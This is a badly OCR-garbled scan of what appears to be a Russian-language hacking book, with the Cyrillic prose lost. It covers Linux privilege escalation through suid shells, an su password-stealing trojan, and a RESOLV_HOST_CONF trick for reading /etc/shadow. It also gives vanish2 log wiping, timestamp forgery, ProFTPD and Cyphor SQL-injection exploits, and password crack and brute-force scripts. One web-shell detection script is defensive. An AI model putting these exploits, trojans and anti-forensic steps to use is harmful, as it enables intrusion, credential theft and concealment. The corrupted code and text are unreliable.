( ),
root -,
.
SS H - .
, .
, ,
/bin/sh,
system ("chmod 4755 /tmp/hack");

11 2

0D.

root chmod 4755 I su)d ( 4) /tmp/hack

.
hack, :
1nt main

Qetu1d(0);
getg1d<0):
file fopen (/* r);
cmd - fgets (file);
fclose(flle):
system(cmd);
}

/tmp/cmd ,
/tmp/hack suid.
. /tmp
tmp/evi 1.

, , /tmp/
cmd.
? I I o t o m v ,
root,
( do brk).
, , ,
/tmp/cmd
Iptables -t nat -nvL
, ,
Iptables

.
iptables
( )
- P H P - suid,
root.
,
(-day) ( ) ,
, .
. /bin/sh,
. 11 :
#!/b1n/sh
alias /b1n/sh" "chmod 4755 /tmp/evi1"
. /bin/sh root
chmod.
root
Back rack . (2.6.30),

113

: , , root..
I ! , . , -
?
I , root?
,
. , .bash history, ,
su (switch user),
. su
, .
:
mkdir .elm

, .ssh,
.
( ) .bashrc, :
-$0/.1:$

.elm. , su
( ), su ,
/bin, . su.c,
FA-Q 1999 , http: //www.
packetstormsecurity,org/trojans/index7.html.
:
/*
*
*
*
*
*

su trojan ribbed - by FA-Q


werd to lwn for his help.
mkdir .elm
cc -o -/.elm/su su.c
edit .bash_profile or .bashrc
add PATH-$HOME/.elm:$PATH

*/

#1nclude <stdio.h>
#include <stdlib.h>
//define SU_PASS "/tmp/.rewt"
rnalri (int argc, char *argv[])
char *key;
char buf[24]:
FILE *fd:
key (char *)getpass ("Password:"):
fd - fopen (SURPASS,"w");
(printf(fd, "pass: *s\n", key);
f1ose(fd):
printf ("su: incorrect password\n"):
sprintfCbuf, "rm *s", argv[0]):
system(buf):
exit (1):
t/

-.:

..

114

OD.

*0 -/.elm/su

su.c

, . ?
/tm p /. rewt,
, , .
,
, su.
, su.
, / tm p /. re w t. , ,
, - .
. :

sprintf(buf. "rm Is". a r g v [0 ]) ;


:
sprintf(buf. "rm /hone/user/.elm ts. argv[0]):
To rm su.
(, D Y L ) su: incorrect password
, , : Sorry.
D V L
, BackTrack 4
(. 0D.2).
rootgbfc /home/uri - shell (Console
Session

Edrt

View

Bookmarks

Settings

Help

u r i@ b t:~ $ c c -o ~ / .e lm / s u s u .c
u r i@ b t:~ S I s - l a .e lm
t o t a l 20
d r w x r -x r -x 2 u r i t i r i 4 0 9 6 2 0 1 0 -0 7 -1 0 1 5 :4 3
d r w x r -x r -x 9 u r i u r i 4 0 9 6 2 0 1 6 -0 7 -1 0 1 5 :4 0 . ~
- r w x r - x r - x 1 u r i u r i 9 3 6 8 2 0 1 0 -0 7 -1 0 1 5 :4 3 su
------u r i@ b t : ~ S e c h o SPATH
/h o m e /u r i/, e l : /u s r /lo c a l/s b in : /t t s r /lo c a l/b if i:
J ^ to n :/u s r /b in :/s b in :/b in :/u s
/g a m e s
u r i@ b t:~ $ s u P a s sw o rd :
s u : in c o r r e c t p a s s w o rd
u r i$ b t:~ $ c a t /t a p /.r e w t
pass: to o r
u r i< a b t : ~ $ s u b a s h : / h o a e / u r i / . e l e / s u : N o suck f i l e o r d i r e c t o r y
u r i @ b t : ~ $ w t lic ll S ( L k
I
4 ye
j/b in /s u
u r i@ b t:~ $ / b m / s u
P a s s w o rd :
r o o t @ b t :/home
.t |

P u c 00,2. su

***

**~

,---._____________. - ..

___

115

|1 (home/uri).
su
root /tmp.
, su
bash su - /home/uri/.elm,
. , , ,
. su : /bin/su. ,
, su, ,
(, /bin/su), .
echo $
SPATH .
su ,
, .
, ,
.
, http://www.spywaredb.com/remove-su-trojan-ribbed/
( ):
Su trojan ribbed .
,

. Su trojan ribbed , Spyware Doc
tor. Su trojan ribbed , su.c.txt.
.txt . ,
su. .txt. (
, ),
su. ,
/tmp ,
. ,
,
.
, ,
. Spyware Doctor ,
.

.
/etc/shadow ,
root? .
, ,
. 1i be
5.4.7.
suid: ping, traceroute, rlogin ssh.

116

OD.

1. bash, bash.
2. :
export RESOLV_HOST_CONF/etc/shadow
3.

-
, asdf:
ping asdf

, /etc/
shadow. ,
!' root. D V L Linux. ,

. ping
(traceroute, rlogin, ssh) ,
RES0LV_H0ST_C0NF, , -, ,
, /etc/shadow. ,
(asdf),
, RES0LV H0ST C0NF.
rcb.c,

;
/* RCB Phraser - therapy in *96
* Limits: Linux only, no binary files.
* little personal message to the world: F*CK CENSORSHIP!
*/

#include <st.dio.h>
void getjunk(const char *filetocat.)
{ setenv (" RESOLV_H0ST_C0NF". fi 1etocat. 1):
systemCping xy 1> /dev/null 2> phrasing"):
unsetenv( "RESOLV HOST C0NF',;) :

>

void main(argc.argv)
int argc: char **argv;
{ char buffer[200];
char *gag:

' 7

,T,..
'

' ' '

'

--ml

if((argc l) || !(strcmp(argv[l],"-h")) || !(strcmp(argv[l]."--help)))


{ printfCRCB Phraser - junked by THERAPY\n\n");
printf("Usage: Is [NO OPTIONS] [FILE to cat]\n\n\argv[0]):

getjunk(argv[l]):
gag-buffer;
gag+-10:
devel fopen("phrasing","rb"):
while(!Teof(devel))
{ fgets(buffer.s1zeof(buffer),develJ:

117

if(strlen(buffer)>24)
{ strcpy(buffer+strlen(buffer)-24.\):
fputs(gag.stdout);

}
}

fclose(devel);
remove("phrasing");

}

rcb /etc/shadow

BMecTo/etc/shadow ,
.
Linux 2.6.7- (
, - )
Linux Kernel 2.6.x chown() Group Ownership Alteration Exploit,
, /etc/passwd, ,
. 2004 ,
Marco Ivaldi,
http://www.exploit-db.com/exploi ts/718/

, root ?
, (
!), ,
, .
,
.
, :
last login from xxx.com time:0:00 date:xx/xx/xx.

IP- ,
. ,
ssh local host
. ,
:
last login from local host

,
.


- - (log wiper).
-. ( ) -.
. ,
. ,
. ,
,
(r o o t),
.
Apache,
.* ' /apache/1 ogs/accessJ og. (. 0 .1 ).
I*

9 1 - - fI5/Jun/2010:23:00i3$ +0000] *6

/*
127 f t 1 -

. / , ,/etc/pa$swd%OQ HTTP/1, 1* 206 71S


* IlS/Jufl/2010:23:4$:$2 4-0000] "GET

/f

/ . / > . / * , / , , / ,/etc/shadow%00 HTTP/l * 200 483

127

J 1 S / J u n / 2 0 1 0 2 3 : 5 3 : 4 0 4-0000J "GET

fw } zrbTbvyz* /
12 ~ 1 i l

Wfl

2M 4m

</, ./>.,/, ,/tc/patswd%00 HTTP/1 * 200 71$

J l S / J u n / 2 0 1 6 : 2 l : S 3 : 4 7 4*0 0 0 0 ] / * y , p h p ? p i g e , / , / . , / . / . / . . / e t c / p s w J

127
/*
I2 7
12?

# J J . - }16/7tm/2010:00:23;20 4-0000] "GET

/. ../ - / . , / - < / . , /etc/passwiftOO " 200 71S


1 1 1 - - n * / J W 2 0 1 0 ; 01:20:13 +0000] "GET /cad.php?cadls,php HTTP/1 >0*
f . l - - I16/Jun/2010:01J20:13 4 0000] "GET
* . ^s5>ebttj,:/Acalho*t/cad,php?cadl* HTTP/1 *1 * 200 38
. . - - 12/Jun/2O10;01;2Ot37 +0000] "GET /cad,php>cad\* tfltP/i , i * 200
1 2 I J J J . . U6/Jiir</2010:01;20:37 +0000] "GET
/ j s ^ ' ' M 9 **^tsi// 1.calh 0 ft/ced .php*cadls%00 HTTP/1,1" 200 176
* - * |26/J*n/2010;O1;21;39 +0000] "GET /cad, php>cacbls HTTP/1.0* 2 M
127 t t 1 ,
f2 6/Jn/201#;Ol:21:39 4*0000] "GET
:
j/ / loc lho st/ c ad .p hp ?c a d -i* HTTP/1 " 200 I K
12? f i i .
]1/ *. 1 0 :0 1 : 2 3 il 4 +0000] "GET /cad php?cadW HTTP/1,0* 200
127 t i l 136 /J un/2016:02 123:14 +0000] "GET
it:
,ttp ; J'/X\t/cid>php?cadls HTTP/l * 200 IBS

200 26

164

173

123

J>c 0E.1. accessJog

: V anish2. [^ Neo T he I lacker.


:
"*

OKfcetstfirnwecurl ty, org/UNIX/penetrat 1on/1og-w1 pers /vani sh2. tgz

119

WIMP, UIMP, la s t log, messages, sec ure, xfor log, iii.-i11 imj,

, 11, ht 11I m i tstt Iog, httpd, error Jog.


im *.|) (HBbsaga5, secure httpd.access_log. ( ' '.*
-|-< i b i b
h o i /4 . , m
W*
I /tllip :
wviet U v.b i KIu |./ hl-tp;//packetstorm securlty.org/UNIX/
penet fvit ton/ jog wipers/yan1sh2.tgz
1, :
tflf

v/vf VflliKlw' tg/

:
oi4 VrtBiOu*

vnriish?

0 1 (D am n V ulnerable L inux)
\ , exit .
ex1t() exit(O). .
1 (. 0 15.2):

vflBlvhi nobody local host 127,0.0.1

Hr!| .<gpf vanish?, vamsh2

J!H iSti

V t f lllM

Vftiuth II hy Noe the Hacker


; vanish? uer <host>

<i p >

# vanish? nobody localhost 127.0.0.1


perm iftion denied.Getting
uteip target m i >
fINI i I

Futkmg elu tf i

. . 2.

outta here,

Vanish2

ul.fflp , wtmp . ,
Van bit 2 - , .
. .
Vttiii*sli2. *
. ,
,
exit(O),
, , :

#xit(0)

OS* I |>|) \ * it

'V|Hiil ' ill I *. lug 1 | Ut) 1 1|1 , llt ir 'ir ;vroco


ii|>ok|uiMMM |<1, iiii pm OK i etce** log, .
, , 1 | , 1 | " |( H O H H O C I t . M , I I O I O M V 4 1 0 1 ( 1 1 ( M l y i | o< V11 (( I | H I M

I,'/

I)

(I

pCM M iaioH

11 I I 111 H i t I l l ' l l )

ta iilH TI

IP

, nil) Mil? . iis tii11it* ell o ieo TilHHM ofipaioM,


i pa in* i , , IIMenilO 1 <<ru

tMvu

mi vViit Mr\yA#pfl

/vui/lN/wum not t'otiml

rniiw om i /vim / Ua l

/11*/\ i'Hiiml

iiu rii
WkiUW'
MU

huju, rtH lay

i.**! 1/ bytii net icro* Is n 't fi* eh

ley i miI

I'i'iM 1 \ 5 / u i f / l i t i t y M u h t / . ' l e i i / t r f ' i f ,lu y

t ktuiti I

Ls'li \ f byim not (> Csn't fix th

h i* /// lug h w l

V, .A j 1.1 H.t |

your TfifiS nivl liiii f

I'm

ill

I ' t ^ y i i u i n i |iriO<11hi 1/|11|)1 11 M I X V d l il s h Z

I 111, Viiiiin!)^ <*ri* [i*t.


hiH ' pro, o o li
n 10
' ii 11,mi nal) |
III | //p,ii %I 11 iiril nrij/HN I/||* Iril inn/1 iil| wl|.iei4i/
I lo , i foot ,
( ?
iMWiiiiioiui
|,,| , *| Utllip WtlTip.
'.ill
( MilOMHTe/ieft ) II in < , I | .
imp* II PuTTV W in d o w s , / *1 TTY (1)1 lllot etc n pseudo-termi-

I |ii

10

IV | * 10 , im .
, >, , ! toucn t,
>i .1 < pny I | I I
tiHu M I 1111 MMJy(MMMM| 11- | i/iiiilibV // ri/iui ti)

121

,
, , ,
.
. ,
, ,
. ,
f i 1 . 27 2009 23 35 22 ,
:
touch -t 200906272335.22 f i l e .

,
.


, , , .
,
root,
.
, , , .
, ( w who)
( 1ast). ,
, last _.
( finger). /etc/passwd
/etc/shadow, . ,
, FTP, .
PuTTY, ,
Session Logging (Printable Output).
putty. 1 ( , ).
cat
.
.
/etc/shadow,
( /etc/shadow.old shadow,
).
LDAP, /usr/local/openldap/backup
LDAP . ,
, ,
base64. Perl,
, ,
John The Ripper.

.bash hi story.

123

(root). , (
.sh . .).
,
, .
root
hack, hacking, hacker, intruder . . ,
check_i ntruder. sh ,
. , ,
, ,
.
/etc/h o sts ssh/known_hosts,
, .
root .
root , root
,
ssh:
ssh root@other-host.net

,
.
3 (. 10.1).
. SQL-
, . XSS
.
, (
),
, .
,
().
: FTP,
,
(systemO, passthruO shell exec ), a peri- python-
. ,
-, .
-
,
.
, *
(,
).
, root ,
.
, , ,
,
.
, .

) 1$

1.

HtlhHVM

*|1

1 tat U MMbf'HiHH

-
V *'*

*
-

911

*|<
1| | ) 1 I W f t ! 1

11 luib&vvohl

1*
|0# II*

1 01 idMHi




root

I till\ m t i ) ,

$$
tfillUit


^41 ti
fciclO UtcMMM



,
root

i'rtpbtfjM

. 10.1. *| 010 i p <,

1-,

(remote) ,
.
.

(). ,
.
,
( -),
ftp- ProFTPD.
1.3.1 1.3.2 2,
SQL-. ( )
ftp- ( 21),
:
USER myuser
myuser .
:
PASS password
password myuser.
, FTP (
, , ).
% SQL-,
users () ,
1:
USER %') and 1-2 union select l.l.uid.gid.homedir.shell from users: -PASS: 1
.

http://downloads.securityfocus.com/vul nerabi1i ti es/exploi ts/33722.pi
:
./exploit.pl ftp.example.com

127

ftp.example.com ( ftp
FTP). ,
:
[*] Connected ftp.example.com
[!] Please Choose A Command Execute On ftp.exarnp1e.ccr :
[1] Show Files
[2] Delete File
[3] Rename File or Dir
[4] Create A Directory
[5] Exit
Enter Number Of Command Here ->
, 2005
: Linux-ftpd-ssl 0.17 (M K D /C W D ) Remote Root Exploit. .nut
ftp-
Linux.
,
. Sun
OpenSolaris (LiveCD). - ,
OpenSolaris,
DHCP- (
), jack
jack su
opensolaris. 2008 , Sun
.
,


.


. , , ,
.
. (
, 2005). 100
(), , .
,
check.sh ( ),
-. , -
-, r57shell, 99sh, void.ru,
PHP-, shell ,
base64_decode create function.
/var/1 og/check.log, -
.
, .
, shell ,
, - eval,
system passthru. ,
(cgitelnet, nfm . .).
#!/bin/bash
if [ $# -It 1 ]; then
echo usage: $0 file_name";
exit 0:
fi
RESULT-'
FILE""
for F in $( grep \.php$" $1 ); do
FIND='echo $F | grep -c "\.php$"'
if [ "$FIND" == "0" ]; then
if [ "$FILE"
j; then
FILE*=$F
else
FILE=$FILE" "$F
fi

I ip o I . i

el St'
if [ "SFILE" ] : then
FILE-SF
else
FILE-SFILE" "SF
f1
Fl"/usr/"SFILE
1f [ - f "$F1" ] ; then
RE-'grep -c r57shell "SF1" '
i f t "SRE" ! - "0" 3: then
RESULT-SRESULT"\nFIND possible hack f ile SF1
f1
^
*? ! 'l l
RE-'grep -c gzinflate "$F1 '
1f [ "SRE" ! - "0" 3: then
RESULT-$RESULT"\nFIND possible hack f ile "$F1

"
j

fl

RE-'grep -c 99sh "$F1" '


1f [ "SRE" ! - "0" 3; then
RESULT-SRESULT"\nFIND possible hack f ile "SFl
echo SFIND "SFILE"

; .

RE-'grep -c "\.void\.ru" "$F1"


i f [ "$RE" ! - 0" 3; then
RESULT=$RESULT"\nFIND possible hack f ile "$F1
echo SFIND "SFILE"
^ 'J ? i
fi
RE-'grep -c "shell_exec" "$F1" '
1f [ "SRE" !- "0" 3; then
RESULT-SRESULT"\nshell_exec:FIND possible hack f ile "SFl
echo $FIND "SFILE"
' > *'
"
fi
RE-'grep -c "base64_decode" "SFl"
if "SRE" !- "0" 3: then
RESULT-$RESULT"\nbase64_decode: FIND possible hack f ile "SFl
echo SFIND "SFILE
fi
RE-'grep -c "create_function "SFl" '
i f [ "SRE" ! - fo" then
RESULTSRESULT"\ncreate_function:FIND possible hack f ile "SFl
echo SFIND "SFILE"
fi
fi
FILE-""
done;
for f in $( grep "\.htaccessS" $1 ); do
FIND-'echo $F | grep -c "N.htaccessS"'
1f f "SFIND" - - "0" 3; then
if I. "SFILE - - "" ]; then
FILE-SF
,
else
FILE-SFILE SF

, v 'i?>

&

130

12.

f1
else

1f I "$FILE" H" I then


FILE-$F
else
FILE-$FILE" "$F
f1
echo $FIND "$FILE"
F1-$FILE
1f [ -f "$F1" I then
RE-'grep -c "appl1cat1on/x-ht.tpd php"
1f [ $REH !- "0" ]: then
RESULT-$RESULT"\nFIND possible
f1
f1
FILE-""

f1
done;
FILE-""
:
for F In $( grep "1ndex\.html$\|1ndex\.php$\|1ndex\.htm$" $1 ); do
FIND-'echo $F | grep -c "1ndex\."'
,,
/hfdv f
if | "$FIND" "0" I then
if [ "$FILE" - - "" ]: then
FILE-SF
.. '.
else
FILE-$FILE" "$F
. .,
,
fi
^
e
if [ "$FILE" ~ " ]; then
(I - '
FILE-$F
else
FILE**$FILE "$F
s ir
" * J
I

echo $FIN0 "$FILE"


' H :C. m
Fl-7usr/"$FILE
if [ -f "$F1" ]; then
j
RE-'grep 1 -c "viagra" '

;* j
if [ "$RE" !- "0" ]: then
RESULT-$RESULT"\nFIND possible hack file "$F1
f1

fFILE-""
1

^ :

done;
if [ "$RESULT" !- "" ]; then
echo -e 'date'$RESULT /var/log/check.log
echo -e 'date'$RESULT | mall -c sysadm0rnys1te.net -s "Rod Alert
possible hack file on myslte.net" adm1n9n\ys1te.net
else
echo -e 'd a te ' didn't find Intruder," /var/log/check,log


IT -

| ,

. ,
,
. , , ,
,
. , .



,
.
.
, , ,
(!).
1990-
,
()
. ( , )
,
( A B F),
(subsidiary) .

,
*,
.
,
( ).
ABF * (
, ,

132

13. -

) -
,
.
. ,
.
(
), .
, .
.
3- LINC . ,
, 1970-.
LINC II,

, ,
.
, LINC II,

...
LINC II , ,
, .
, ,
.
,
:
. ,
,
.
.
, ,
- .
, , .
.
: , (
) , , ABF,
UNISYS.
. (, , )
, , ,
.

, , ,
, ,
. , ,
. U N ISY S-U N ISY S,

ICQ

133

. , U N ISY SUNIMAS ( , , )
, ! .
,
.
, (
)
, ,
,
. ? , ,
,
.
?
,
, , ,
IT- ,
.
.
.

ICQ
2007 , . ,
, ( ),
. , , ,

. ,
.

: , ?
,
, .
. ,
, ,
. ,
, , jimm.

, -
. , jimm Java .
(

134

13.

*{/.), iifwi Java


, jar-.
. -/, jimm ,
'(^ , 11 , ,

jimm, .
( : : -, /
; -,
<| 1?! ; -,
( , ) ,
, , .
,
, , , .
.
,
jimm
, , . , ,
,
- .
, ,
. ? :
ICQ -.
, .
, ,
.
,
, ,
. .
, .,
. -
ICQ, :
.
, , .
.
( !;

I C Q { , ). ,
,
. .

,
274 , ,
.

135

,
. , ,
, ,
, ,
, ! - ,
ICQ- .
, , , .
, .
.
, , ? ,
, . .

,

,
,
.
, 2005 .
, ,
,
Linux.
,
.
, , ,
/tmp, , , ,
. , /tmp
.
Windows, .
, ,
- 1-.
, , ,
- - Perl.
: ,
, .
- .
, ,
. , , -,
.
, -.

136

13. -6

- ,
, .
,
, ,
.
, Google, .
,
,
-,
. Google
, .
, /tmp ,
. , - ,
-,
. .
, Linux Unix- ,
, , ,
.
, ?
,
, -,
, .
- , ,
90-, .
, ,

-,
,
. ,
, -
Google . -
.
, ,
.
root ,
( , suid).
Linux
2.6_, 2.4.x (
). , , , Google
( linux kernel 2.4. local root exploit)
root,
.

137

, ,
, , ,
- .
. ,
,
, ,
.
.
, ,
,
,
- , .
, ,
, - .
,
,
. ,
.

*nix-

Is <dir>
.
dir
. .
pwd

,
cd <dir>
,
cat <f1le>
.
1d
,
whoaml
? ,
-
,

uptime
( ).
netstat
.
man <command>
*nix-.
<command> -help
.
users
.
who
, .
W
, .

*-

ps


ps -

,
kill <PID>
<PID>.
finger <login>
.
last

,
last <login>

.
<file> <newlocation>

.
mv <file> <newlocation>

.
rm <file>

.
mkdir <dir>

.
rmdir <dir>

.
chmod <file>

.
vi <file>

vi.
vim <file>
.
<file> - <outfile>

.
gcc <file> - <outfile>

GNU.
wget -0 <outfile> <url>

.
curl - <outfile> <url>

139

SQL-
show.php Cyphor

SQL- show. php.


Cyphor.
,
show, php , , ,
, .
.
.
, cyphor/admin/forum-create.php .
. 2.1, includeC"check.php)
#.
. .
<?
include( " . ./include/db_*ysql.php*);
Include( ". ./include/settings .php");
include(* . ./ in c lu d e / g lo b a l .php");
include!"admin.php" ) ;
# ffi l ude i *c h ec k * php* f t

. 2.1. cyphor/admin/forum-create.php


http://1ocal host/webexpl oi tati on_package_02/cyphor/admi n/forum-create. php
, . 2.2,
Create Forum.
SQL- id.
(. 2.3):
http://1oca1host/webexplo1tation_package_02/cyphor/show.php?fid*l&id-l0
union select 1.2.3,4,5.nick,password.8,id .10 from cyphor_users where idhl
cyphor_users id, nick, password
, id-1 ().

SQL- /* show.php Cyphor

141

Location

View

Edit

fio

j^aokfnark&

Je o li

yyindow

N 4

E > Location: jfib http^yiocalhost/wHirxploHiitiun kiiu<i 02/cyphei/admlnAforiim-c rrntr php

Create A New Forum

[Test Forum
My t e s t

[ftj
H
iIA <
| j

forum

Short descriptiM (max. 255 cbars)


MySQL-Tablename (no spaces, tor
example: msgjest") Table prefix Im sgjest
will be added automatically.
lift button only oitfol
| Create Forum

^%*||*1

Page loaded.

. 2.2. Cyphor

! >;0.
Location

Edit

View
.

Qo

Bookmarks

. .

loots

Settings

jyjndow

tJelp

mj

Location: If2 !*select%2 0 1 .2 .3 .4 .5 .nlck4pas;;word,8,ld,1.0 % 2 0 from% 2 0 cyphor_users%2 0 where% 2 0 i d l


>
**\*9*11*

admin, posted by lexi, [1], January 01,1970 - 00:00, Viewed times.

Text

User Info

^ J jj J

ad4KRH.YJ7j9A
alexl
(0 posts total, test
post: N/A)

1
Forums Overview l tatia1

Reply to this post

1 .
1U

H .v w

Cyfihflf(fteteas: 0 19, PHP 4.4.4)

Page loaded.

. 2.3. SQL- id show.php Cyphor

142

2. SQL- show.php Cyphor

:
? MvSQL information_schema tables columns.
:
union select 1.2.3.4,5.6.group_concat(table_name),8.9,10
from i nformati on_schema.tables.
SQL- fid
show.php. , (
,
).
, , fid
(, fid--l), id
. ,
- :
fid=-l union select 1.2.3.4 from cyphor_users
(. 2.4).
^ 5 1 1._^02//5. - Konqueror

Location

dit

View

Go

Bookmarks

I s

Settings

jjVindow

Help

Location: j jj^_02/cyphor/show .php?fid=-l% 20ijnion% 205elect% 201,2,3,4% 20from % 20cyphor_usersj^ i *]

MySQL Error: Invalid SQL: SELECT id FROM cyphor_4 WHERE parent_id*0


Database error: 1146 (Table cyphor.cyphor_4' doesn't exist)
Please contact us radmin@domain.extl and specify the exact error message.
Session halted.

Page loaded.

. 2.4. SQL cyphor_4

,
: cyphor_4. (
show.php) ,
, .
, msg test.

SQL- show.php Cyphor

143

'msg_test' ( ,
, ).
.
- ,
concat:
http://1 1host/webexploi tati on_package_02/cyphor/show.php?fi ch-1 uni on
select 1, concat(nick,0x3a,password),3 ,'msg_test' from cyphor_users
. 2.5.
admin;ad4ERM,YJ|7j9A - Konqueror
l ocation

d(t

yiew

Location:

ftookmarics

f "i

- 1 ! 4

'*. ;

M l

Iools
\ /

Settings

BJindow
:%

on% 2 0 sdect% 201 iconcat(niclc,0 x3 a4pa55word),3 /msg- test,% 20 from% 2 0 cyphor- u 5ers

Discussions > admin:ad4ERM.YJ7HJA fO Threads. 0


(Messages total)

1 userfs) online

[peal new t M k ( Threads


Author

ls**ed

Date

(emtpy forum)
Post *ew t m c j Ottapse

jfim w O m

Page loaded.

m s 1l ia I j

.... . ...

. ..

,|

to-

j^

(Release:

. 2.5. SQL- fid show.php

, ,
, .
.



Cyphor

Cyphor crypt
(), .
,
8 , ,
1000 (
). - ,
? , .
, (re g is te r.p h p ),
randomjjassword ( global s . php).
8- ,
, ,
.
, tim e(). ,
U n ix- ,
1 1970 . ,
cyphor users
( signupjdate). S Q L -
, . 3.1.

' & 1103205559 *


Qe

Zemngi

bif ; .';

T T iD

&m4Gw
m

.w^0x3a.nick,pa5swofd#griup date),3/msgj.e,st% ?0fTom % 20cyphor^uie<T.,


:k d
.' *
jA *
M y 1 ) 9 0 9 * ad m in ;a<Hf R M .Y J / / 9 A :1 103205359 (0 Th re ad s, 0
1 uein() onbiic
M if f t & f P i total)
_ j
,1

f*tt w w im t l M

- U . ! 41

. . . . . . . . T - II

I-I

i. - -

I- 1 ......................................................... ....... - J

rr

-Hii.frn.'-if-'r

. '-.-I.I.

i i l M
Author

Subject

fatel

(errrtpy forum)
Pttiftttr.

j 0 .'.1 .
gj$f| Jum p to...

;*j;j G O j
'

If trim . ty m w * I Iinm i

t Mat

0.19, PHP 4.4 4 )j

V <

mmnM

. 3 .1 .

, ( )

Cyphor

145

,
, ,
( signup date). regi s te r . php ,
signup_date + 1 (
). ,
signup date, random password.
( ,
). ,
( crack-pass. php), . 3.2.

#
admin:a(f4EflH.YJ7j9A;118326S359
$ti*eO - 1276826876;
fuser nick m *alice";
IhastT- "al,JF7HbXCbK.* j

for

a lic e;a l.IF 7 H b X C h K .;1276826876

$i|i+l)

i
Ipassword randoa^passwordi $tiroeO);
$p m crypt($p55word, 5trto*lower($user^nicK));
if {$p
$ha$h)
printf{"Password for user fuserjuck - $pas$word\n*)i
xit()i

>

$tie8 |tie + 1;

printfPPasstford WOT found fo r user? $user_nick \n* ); i t s


function randoMj)assword{$f$_tle} {
srandf ireg^tii&e) j
$const * ^bcdfghjidfflnpqrstvwxz*,; $voy * *eaiou*;
$chi - 123456789** $sp t
$new^paswd * subftr($cons< rand{0,(strten($cons)*1})* 1) ,
substr(|voy> rand(0*(*tf\en($voy)-1))* 1) .
substr($cons, rand(G*fstrl(Icons)-i)), 1) .
substr($voy* rand(,(strlen(ivoy)-1}), 1} *
substr($$pe, randfCMstr\en($$pe)-1)}, 1) .
substriSchi./ rand{0, (strten($chi) -1)), 1) *
substr($chi, rand(9,
-2)), 1) .
substr(|cons, rand(6,(strlen{$cons)-1)), 1);
return |new_pas5wdi

?>

'

. 3.2. crack-pass.php

crack-pass.php
, .
. ..


( ).
cyphor ( README.
txt, ).
.

146

3.

* W
Locabon

#$

)[)*&

Q/'i

bookmark*

JooU

\
Lc

Settings

Window

ijelp

V \ ;

1' ttp i j f;i n package 02/yphotfcrack pass.php j ^

- 4.

Password for user alice > buno;34x

^ageloaded
. .-

crack-pass.php

: .
, .
11 SQ L-.
, . ,
( ,
, ) ,
, . 3.4 ( brute-pass.php).
<?
f users:

adM in: ad4ERM , J 7 j 9 A ; 1183253$9

OP.

a l i c c t ft I . IFlHbXChK. 11276826876

$user_nicfc = *at ice*; (hash - *al,!F7HbXChK. *:


Icons = "b cd fg h jkle n p q rs tvw xz* ; (v o y * *eaiou";
$chi "123456789"; $spe =
ftie e O = t i m e ( } ; p rln t("P a s s w o rd b ru te fo rc e fo r user $user_nick s ta r te d . . . \ ) ;
for
$i l <20;
f o r ($x2=9:$x2<5; f 12*$ 12*4) f if {$ i2 > 0 } p r i n t ( " T r y i n g password $passwd . . A i T ) ;
fo r ( $ i 3 * 0 $ i3 < 2 6 : | = $ ^ 1 } for ( $ i 4 0 ; $i45 ;
$14-$i44-lJ
for ($ iS 0 :$ i5 < 4 ; $i5$x5+2')
f/*r ( $ i 6 - 0 : $16<9;
$1-$14-1)
for ($x 7~Q;$ 17 < 9 ; $ i 7*$x 7* l) for I $x3 0 ; $i8<20; $ 18- $ 18+ 1 )

$passwd = subistrf $con 5* H , 1) .


su bstr($voy. $12. 1)
substr; fcons, *x3, I) , # <20
substr($voy, $14, 11 , 4
substr{fspe, f 15 , 1) , # 4
sutostr($chi. $16, 1)
9
su b strf % c h i f , I j * 9
# 2
m
s u b s t r i icons , $i 1 ):
IP = cryptf fpassvd, s trtolower( $ u t t r
i f (fp $tii l f i /

p r i n t f t 'Password found fo r user |ue*r^nlck > $passwd\nM) ;


$delt5 * t i mef j fti aeC ;
p r i n t f t * Elapsed t i ; $del ta secNa*); e x i t O *

> (d e l t a * tim e ) - ftie e O ;


p r i n t f i *Password not
fo r user : fuser^fuek Vatlapsed t Ime: f d e l t a sec\a")*
exit* s ;
?>

. 3 .4 . brute-pass.php

Cyphor

147

45 .
,
.
. 3.5. al ice 118 .
Konsole <>

ibt cyphor 0 php brute-pass.php


(Password bruteforce fo r user a lic e s t a r t e d . ..
jT ry in g password bezu-99z . . .
ITryin g password bazu-99z . . .
j Trying password bizu-99z . . .
ITryin g password bozu-99z . . .
Password found for user a lic e -> buno;34x
Elapsed tin e : 118 sec
bt cypher |

"i"'

. 3.5. brute-pass.php

( )
. ,
, ,
, (
).
,
, , .
5 ,
2 .
The matrix, :
-
. ,
instantCMS.
, ,
8.
, ,
-.

148

3. Cyphor

,

Telnet ( 80) , :
telnet 127.0.0.1 80

GET / HTTP/1.1 Enter. -


, ,
. 3.6. , - ,
. .

. .. -


.
,
.
crack-pass.php.
, PI 1
, ,
( ,
-,
admin, - ;
, ;
, John The Ripper).

, ,
.
. ( )
, SQL-, UPDATE,
3 ().
.
, !
.

Cyphor

149

,
?
, . 11,
md5-x3Hi , uname -,
id, pwd, who, ps . . ( Cyphor *nix-),
,
.

. - .


SQL Cyphor

, ,
http://www.securiteam.com/unixfocus/6P00FlFEKC.html.

- , ,
cyphor019.pl. , ,
$urt, users cyphor users.
. , Surl
, .
#!/bin/env peri

# //.....................................................................................................#
#// Cyphor Forum SQL Injection Exploit .. By HACKERS PAL
#// Greets For Devil-00 - Abducter - Almaster
#11 http://WwW.S0Q0R.NeT

# //..................- ............................................................................. #
use LWP::Simple:

print -\n
print "\n# Cyphor Forum Exploit By : HACKERS PAL #";
print "\n# Http://WwW.SoQoR.NeT #":
if(!$ARGV[0]||!$ARGV[1]) {
print \n# -- Usage: #";
print "\n# -- peri $0 [Full-Path] 1 #;
print "\n# -- Example: #:
print "\n# -- peri $0 http://www.cynox.ch/cyphor/forum/ 1#";
print "\n# Greets To Devil-00 - Abducter - almastar #";
print "
exit(O):

}
else

print "\n# Greets To Devil-00 - Abducter - almastar #";

pri nt -\n *
$web=$ARGV[0]:
$id-$ARGV[l];
$url = "show.php?fid-2&id

- - 1020union^20sel ect^20i d.2.3,4,5.nick,password,8 .i d,


10X20from^20cyphor users^20where^20id~tid":

SQL- Cyphor

$s.ite="$web/$url";
$page = get($s1te) || die "[-] Unable to retrieve: $!";
p rint "\n[+] Connected to: $ARGV[0]\n";
print "[+] User ID is : $id ";
Spage =~ m/<span class=bigh>(.*?)<\/span>/
&& print \n[+] User Name is: $l\n";
print "\n[-] Unable to retrieve User Name\n" if (!$ l):
$page m/<span class=message>(,*?)<\/span>/
&& print "[+] Hash of password is: $l\n";
print "[-] Unable to retrieve hash of password\n" if (! $ l) :
}
print "\n\nGreets From HACKERS PAL To you :)
NnWwW.SoQoR.NeT . . . You Are Welcome\n\n";
#finished

151

.^

.
h tm l-, <span class=bigh>
</span> ( ) , <span
class=message> </span> .

